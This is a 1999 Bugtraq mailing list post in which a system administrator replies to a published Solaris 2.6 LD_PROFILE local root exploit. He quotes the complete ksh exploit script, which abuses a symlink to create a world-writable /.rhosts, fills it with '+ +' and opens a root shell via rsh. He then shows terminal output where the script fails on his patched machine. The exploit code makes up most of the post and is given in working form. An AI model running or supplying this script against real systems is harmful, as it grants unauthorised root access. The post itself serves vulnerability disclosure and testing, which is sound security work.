Bugtraq mailing list archives
Re: LD_PROFILE local root exploit for solaris 2.6
From: bsides () TOWERY COM (Brock Sides)
Date: Thu, 23 Sep 1999 16:43:51 -0500
On Wed, 22 Sep 1999, Steve Mynott wrote:
works on solaris 2.6 sparc anyway... #! /bin/ksh # LD_PROFILE local root exploit for solaris # steve () tightrope demon co uk 19990922 umask 000 ln -s /.rhosts /var/tmp/ps.profile export LD_PROFILE=/usr/bin/ps /usr/bin/ps echo + + > /.rhosts rsh -l root localhost csh -i
Not on my system: [[brock@agfa brock]$ uname -a SunOS agfa 5.6 Generic_105181-16 sun4m sparc SUNW,SPARCstation-20 [[brock@agfa brock]$ cat r00t.sh #! /bin/ksh # LD_PROFILE local root exploit for solaris # steve () tightrope demon co uk 19990922 umask 000 ln -s /.rhosts /var/tmp/ps.profile export LD_PROFILE=/usr/bin/ps /usr/bin/ps echo + + > /.rhosts rsh -l root localhost csh -i [[brock@agfa brock]$ ./r00t.sh PID TTY TIME CMD 22565 pts/5 0:00 r00t.sh 22484 pts/5 0:01 bash ./r00t.sh[8]: /.rhosts: cannot create permission denied [[brock@agfa brock]$ -- Brock Sides Unix Systems Administration Towery Publishing bsides () towery com
Current thread:
- BT/Cellnet Genie vulnerability James Fidell (Sep 15)
- Re: BT/Cellnet Genie vulnerability James Fidell (Sep 15)
- Vulnerability in dtaction on Digital Unix Zack Hubert (Sep 16)
- Re: Vulnerability in dtaction on Digital Unix Eric Gatenby (Sep 16)
- Nmap and Cisco Dos, clarification -- Lancashire, Andrew (Sep 22)
- Re: Nmap and Cisco Dos, clarification -- Darren Reed (Sep 23)
- LD_PROFILE local root exploit for solaris 2.6 Steve Mynott (Sep 22)
- Re: LD_PROFILE local root exploit for solaris 2.6 Brock Sides (Sep 23)
- Re: LD_PROFILE local root exploit for solaris 2.6 Erik Fichtner (Sep 23)
- Announcing Second Annual TooRcon Computer Security Expo Ben (Sep 25)
- Re: Vulnerability in dtaction on Digital Unix Eric Gatenby (Sep 16)
- Re: LD_PROFILE local root exploit for solaris 2.6 Casper Dik (Sep 24)
- Re: LD_PROFILE local root exploit for solaris 2.6 Eric Daniel (Sep 28)
- Re: LD_PROFILE local root exploit for solaris 2.6 Pavel Kankovsky (Sep 24)
- Re: Vulnerability in dtaction on Digital Unix Dave Dittrich (Sep 22)
- Re: ASUS mother board security question... Alan Cox (Sep 16)
- Re: ASUS mother board security question... Nick FitzGerald (Sep 25)